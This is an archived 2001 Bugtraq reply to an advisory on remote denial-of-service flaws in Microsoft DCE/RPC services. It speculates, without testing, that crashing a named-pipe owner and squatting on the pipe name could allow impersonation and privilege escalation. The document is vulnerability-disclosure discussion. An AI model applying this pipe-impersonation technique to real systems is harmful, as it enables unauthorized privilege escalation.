Bugtraq mailing list archives
Re: Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC deamons
From: Georgi Guninski <guninski () guninski com>
Date: Wed, 01 Aug 2001 20:51:36 +0300
Todd Sabin wrote:
BindView Security Advisory -------- Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC deamons Issue Date: July 30, 2001 Contact: tsabin () razor bindview com Topic: Many Microsoft DCE/RPC servers are vulnerable to remote DoS attacks Overview: Many DCE/RPC servers don't do proper parameter validation, and can be crashed by sending an improperly formatted request.
There is some probability this may be more than just a DoS if an attacker may execute programs on the server. My idea is to crash a process which owns a named pipe, create a named pipe with the same name and then wait or force some other service or user to write to the false pipe and then impersonate it, which may lead to elevation of privileges. Details on similar problem in which crashing LSASS.EXE leads to elevation of privileges is available at: http://www.guninski.com/dr07.html Have not verified whether in Bindview's case this idea shall work or not. Georgi Guninski http://www.guninski.com
Current thread:
- Re: Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC deamons Georgi Guninski (Aug 01)